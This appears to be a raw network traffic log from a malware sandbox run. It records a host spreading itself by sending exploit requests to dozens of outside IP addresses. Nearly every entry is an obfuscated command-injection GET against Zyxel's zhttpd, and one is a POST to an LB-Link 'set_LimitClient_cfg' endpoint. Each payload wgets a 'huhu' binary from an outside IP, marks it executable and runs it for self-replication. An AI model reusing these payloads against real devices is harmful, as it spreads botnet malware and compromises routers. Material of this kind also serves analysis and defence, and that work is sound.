                                            Feb 2, 2024 06:21:01.422410965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1622192.168.2.1541882166.129.74.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422436953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1623192.168.2.155131658.181.252.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422493935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1624192.168.2.1560398113.235.55.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422533035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1625192.168.2.155793448.90.24.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422576904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1626192.168.2.1547942107.2.252.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422611952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1627192.168.2.153572427.216.226.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422630072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1628192.168.2.1549260186.251.251.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422652960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1629192.168.2.1548472131.130.68.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422707081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1630192.168.2.1545016104.25.25.2178080
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.364062071 CET237OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.180.149.156/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                            Feb 2, 2024 06:21:02.480948925 CET328INHTTP/1.1 400 Bad Request
                                            Server: cloudflare
                                            Date: Fri, 02 Feb 2024 05:21:02 GMT
                                            Content-Type: text/html
                                            Content-Length: 155
                                            Connection: close
                                            CF-RAY: -
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1631192.168.2.154500045.80.78.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430644989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1632192.168.2.1541608130.4.158.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430675030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1633192.168.2.155102438.92.45.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430716038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1634192.168.2.15342304.252.154.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430735111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1635192.168.2.153944413.225.248.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430782080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1636192.168.2.1558166123.7.168.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430814981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1637192.168.2.1537218144.218.101.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430836916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1638192.168.2.1555198190.35.101.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430886030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1639192.168.2.155745034.155.40.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430922031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1640192.168.2.155707497.4.9.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430962086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1641192.168.2.1539008172.77.209.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430985928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1642192.168.2.153701287.40.94.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.430989981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1643192.168.2.1555664203.6.110.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431034088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1644192.168.2.155904674.97.217.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431077003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1645192.168.2.1537352143.8.81.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431106091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1646192.168.2.1550334102.110.145.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431129932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1647192.168.2.1536278192.178.224.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431175947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1648192.168.2.1535546188.152.98.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431221962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1649192.168.2.1559444106.41.34.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431248903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1650192.168.2.155741293.151.21.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431282043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1651192.168.2.1548206128.131.227.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431332111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1652192.168.2.1556716208.59.230.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431363106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1653192.168.2.1553802205.92.178.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431406975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1654192.168.2.1537670122.82.248.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431437969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1655192.168.2.1549576181.36.130.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431476116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1656192.168.2.1536834130.70.109.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431502104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1657192.168.2.1560570156.70.111.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431529999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1658192.168.2.1549426156.211.104.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431577921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1659192.168.2.1543750185.109.24.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431602955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1660192.168.2.1535192181.233.24.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431649923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1661192.168.2.1540444210.143.82.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431679964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1662192.168.2.155294217.126.9.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431709051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1663192.168.2.154869818.203.47.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431734085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1664192.168.2.1540454210.194.41.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431760073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1665192.168.2.153441057.210.85.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431788921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1666192.168.2.1555372135.155.135.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431843996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1667192.168.2.154796485.97.55.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431875944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1668192.168.2.155454699.110.87.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431912899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1669192.168.2.153477852.128.31.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431921959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1670192.168.2.154068663.121.163.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431952000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1671192.168.2.1536804111.107.200.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.431979895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1672192.168.2.1550038110.217.147.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432014942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1673192.168.2.1544294176.134.186.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432070971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1674192.168.2.1533724134.71.128.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432133913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1675192.168.2.1534020182.199.67.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432166100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1676192.168.2.1545952113.253.111.146443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432214022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1677192.168.2.1544782199.7.164.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432244062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1678192.168.2.154254079.149.199.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432266951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1679192.168.2.1550374212.42.243.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432305098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1680192.168.2.1538262101.193.12.112443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:02.432346106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1681192.168.2.1554926108.17.248.173443
